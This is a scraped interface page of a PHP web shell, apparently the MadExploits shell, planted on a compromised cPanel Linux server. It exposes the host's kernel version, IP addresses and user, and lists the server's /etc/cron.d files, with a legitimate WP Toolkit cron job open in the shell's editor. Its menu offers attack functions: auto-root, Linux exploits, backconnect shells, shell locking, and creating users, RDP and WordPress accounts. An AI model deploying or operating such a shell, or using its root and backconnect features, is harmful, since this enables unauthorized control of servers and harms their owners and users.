Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.22
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
cron.d /
[ HOME SHELL ]
Name
Size
Permission
Action
0hourly
128
B
-rw-r--r--
cpanel-analytics
130
B
-rw-------
cpanel_autossl
76
B
-rw-------
imunify-antivirus
789
B
-rw-r--r--
imunify-notifier
144
B
-rw-r--r--
kcare-cron
54
B
-rw-r--r--
libcare-cron
0
B
-rw-r--r--
mailman
2.2
KB
-rw-r--r--
raid-check
108
B
-rw-r--r--
run_arping_cron
108
B
-rw-r--r--
softaculous
314
B
-rw-r--r--
softaculous2
158
B
-rw-r--r--
sys-snap
42
B
-rw-r--r--
sysstat
235
B
-rw-------
wordpress_update_local
95
B
-rw-r--r--
wp-toolkit-update
881
B
-rw-r--r--
yum
115
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-toolkit-update
# This cronjob is responsible for receiving the updates of WP Toolkit. # It works as following logic: # - WPT CLI is called to receive the available update version; # - If update is found, then the URLs to the host with repositories are updated and cache is cleared for WPT repos; # - If WPT CLI fails (e.g. unable to communicate with update service or WPT is completely broken), then # the cronjob executes wp-toolkit-installer script to set the default URLs to host with repositories; # - Finally the yum update is called to install latest available version. 0 1 * * * root sleep $((1 + RANDOM \% 5))h $((1 + RANDOM \% 60))m; /usr/local/bin/wp-toolkit update-configuration > /dev/null 2> /dev/null || /usr/local/cpanel/3rdparty/wp-toolkit/bin/wp-toolkit-installer.sh --generate-configs > /dev/null 2> /dev/null; /usr/bin/yum -y update wp-toolkit-cpanel > /dev/null 2> /dev/null
Close